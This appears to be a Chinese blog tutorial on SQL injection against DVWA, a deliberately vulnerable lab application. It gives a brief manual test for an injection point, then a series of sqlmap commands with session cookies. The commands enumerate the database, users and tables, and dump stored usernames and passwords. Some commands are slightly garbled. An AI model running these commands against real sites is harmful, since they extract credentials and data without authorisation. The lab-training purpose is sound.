SQL注入部分:DVWA+SQLmap+Mysql注入实战

1.注入点发现。首先要判断是否有注入漏洞
在输入框输入1,返回
返回正常
在这里插入图片描述

2.在输入一波1
在这里插入图片描述
报错,返回
此时可以断定有SQL注入漏洞

3.然后利用SQLMap进行注入攻击,再将DVWA安全级别设置为最低。
在这里插入图片描述
这是一些sql的基本语法

4.枚举当前使用的数据库名称和用户名
咱们输入命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ -b --current-db --current-user
在这里插入图片描述

5.枚举数据库用户名和密码
这里咱们输入:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ --string=“Surname” --users --password
在这里插入图片描述
6.枚举数据库
输入:sqlmap -u “http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979” -dbs
在这里插入图片描述
sqlmap -u “http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979” -D dvwa --tables
在这里插入图片描述
7.获取指定数据库和表中所有列的信息
sqlmap -u “http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979” -D dvwa --tables -T users – columns
在这里插入图片描述
8.枚举指定数据表中的所有用户名与密码,并down到本地
sqlmap -u “http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979” -D dvwa --tables -T users -C user,password --dump
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值